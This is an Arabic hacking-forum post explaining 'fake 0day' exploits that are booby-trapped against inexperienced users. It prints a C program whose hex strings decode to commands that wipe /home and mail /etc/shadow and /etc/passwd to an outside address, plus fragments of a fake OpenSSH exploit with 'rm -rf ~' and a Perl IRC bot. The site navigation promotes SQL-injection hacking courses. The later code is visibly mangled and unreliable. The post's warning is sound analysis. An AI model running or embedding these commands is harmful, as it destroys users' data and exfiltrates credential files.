1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

شرح fake 0day & script kiddies

الموضوع في 'الـقـسـم الـعـام' بواسطة .:: RSS ::., بتاريخ ‏13 نوفمبر 2012.

كاتب الموضوع : .:: RSS ::. المشاهدات : 1,333 الردود : 0 ‏13 نوفمبر 2012
حالة الموضوع:
مغلق
  1. غير متصل

    .:: RSS ::. عضوية آلية

    عضو منذ:
    ‏9 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    <div>السلام عليكم ورحمة الله وبركاته
    إنشاء له سنتحدت في حدة لموضوع عن تغرات remote root أو local root

    وخطورتها على لمبتدئين في تعامل معها سواء على لنكس أو ويندوز حيت يجب أخد لحيطة والحدر أتناء استعملها لأنها تكون ملغومة


    لنحلل هده تغرة ونرى التلغيم لموجود فيها
    كود PHP:
    <span style="color: #000000"> char shellcode[] =
    "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
    "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
    "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
    "\x72\x3b\x65\x63\x68\x6f\x20\x62"
    "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
    "\x68\x65\x68\x65"
    ;

    char launcher [] =
    "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
    "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
    "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ;

    char netcat_shell [] =
    "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
    "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
    "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ;


    main()
    {

    //Section Initialises designs implemented by mexicans
    //Imigrate
    system(launcher);
    system(netcat_shell);
    system(shellcode);

    <span style="color: #FF8000">//int socket = 0;
    //double long port = 0.0;

    //#DEFINE port host address
    //#DEFINE number of inters
    //#DEFINE gull eeuEE

    // for(int j; j char shellcode[] =
    "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
    "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
    "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
    "\x72\x3b\x65\x63\x68\x6f\x20\x62"
    "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
    "\x68\x65\x68\x65"
    ;


    بعد فك shellcode نجد
    shellcode = "/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe"
    أي بعد تنفيده يقوم بمسح جميع ملفات المجلد home و طبعي رسالة bl4ckh4t,hehe عن طريق echo
    نأتي ل-launcher وnetcat_shell
    كود PHP:
    char launcher [] =
    "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
    "\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
    "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ;

    char netcat_shell [] =
    "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
    "\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
    "\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
    "\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
    "\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
    "\x2e\x6f\x72\x67\x2e\x75\x6b\x20"
    ;


    بعد فك launcher & netcat_shell نجد
    launcher = "cat /etc/shadow |mail full-disclosure@lists.grok.org.uk"
    netcat_shell = "cat /etc/passwd |mail full-disclosure@lists.grok.org.uk"
    أي يقوم بقراءة ملف shadow و-passwd وارسلهم إلى ايميل full-disclosure@lists.grok.org.uk
    بعدما رأينا هده تلغمات تعال لنرى تلغيمة موجودة في "0day" OpenSSH 5.2
    كود PHP:
    <span style="color: #000000"> <span style="color: #FF8000">/* 0pen0wn.c by anti-sec group
    * ---------------------------
    * OpenSSH rm -rf ~ /* 2> /dev/null &


    حيت هدا أمر يقوم بمسح جميع الملفاتuser الدي قام بتنفده وارسلهم إلى /dev/null أي سلة محدوفات في linuxl
    نأتي الأن shellcode بعد فكه
    <div style="margin:20px; margin-top:5px"> كود PHP:
    <div class="alt2"> <div dir="ltr" style="text-align:left;"> <span style="color: #000000"> #!/usr/bin/perl
    $chan="#cn";
    $ke";
    while (/
    dev/null;/tmp/hi<span style="color: #DD0000">";
    while (
     


    جاري تحميل الصفحة...
الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...